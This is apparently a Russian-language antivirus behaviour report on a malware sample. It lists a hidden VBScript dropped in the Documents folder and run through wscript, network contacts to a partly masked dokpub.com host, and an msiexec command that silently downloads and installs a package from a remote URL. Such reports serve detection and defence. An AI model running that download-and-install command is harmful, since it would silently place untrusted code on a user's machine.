Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '<SYSTEM32>\wscript.exe' "%HOMEPATH%\Documents\log.vbs"
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\documents\log.vbs
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
Присваивает атрибут 'скрытый' для следующих файлов
- %HOMEPATH%\documents\log.vbs
Сетевая активность
TCP
- 'ge####e.dokpub.com':443
UDP
- DNS ASK ge####e.dokpub.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%HOMEPATH%\Documents\log.vbs"' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\msiexec.exe' /i https://getfile.dokpub.com/yandex/get/https://yadi.sk/d/LGf8mWwWcNmoug /qn
